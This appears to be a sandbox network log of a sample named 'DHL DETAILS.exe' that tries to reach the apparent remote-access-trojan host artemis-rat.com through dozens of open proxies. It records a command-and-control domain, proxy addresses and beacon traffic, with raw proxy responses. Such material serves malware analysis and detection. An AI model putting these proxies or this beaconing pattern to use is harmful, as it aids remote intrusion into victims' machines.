Mar 9, 2024 13:14:19.328735113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.699953079 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1492	192.168.2.5	53869	85.62.218.250	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.344511032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.662645102 CET	1254	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.28 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html;charset=utf-8 Content-Length: 952 X-Squid-Error: ERR_ACCESS_DENIED 0 Content-Language: en X-Cache: MISS from ah_test Via: 1.1 ah_test (squid/3.5.28) Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 31 39 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/">https://artemis-rat.com/</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:19 GMT</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1493	192.168.2.5	49891	80.13.43.193	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.349889040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.536284924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.630044937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646318913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1494	192.168.2.5	54453	172.67.3.108	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.368542910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.523802996 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1495	192.168.2.5	54447	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.369718075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1496	192.168.2.5	53767	94.70.195.145	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.376295090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.689667940 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1497	192.168.2.5	54426	122.51.123.219	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.377274990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.708197117 CET	759	IN	HTTP/1.1 500 Internal Server Error Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 588 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1498	192.168.2.5	54431	45.195.149.79	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.386357069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1499	192.168.2.5	54169	8.213.128.6	8019	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.386940956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1500	192.168.2.5	54209	111.59.4.88	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.392472982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.092283010 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1501	192.168.2.5	54429	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.437298059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1502	192.168.2.5	53045	72.206.181.105	64935	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.437463045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1503	192.168.2.5	54480	91.134.140.160	11946	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.437535048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1504	192.168.2.5	54436	23.137.248.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.437618971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1505	192.168.2.5	54430	194.247.173.17	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.438906908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1506	192.168.2.5	54448	94.131.64.157	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.446536064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1507	192.168.2.5	54428	103.231.78.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.450392962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1508	192.168.2.5	54433	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.461380959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1509	192.168.2.5	49940	51.15.133.214	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.462358952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.998894930 CET	536	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1510	192.168.2.5	54452	177.93.45.154	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.474082947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224093914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.037106037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.723858118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.833235979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.879956007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.943003893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146298885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1511	192.168.2.5	54437	47.100.236.23	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.477490902 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
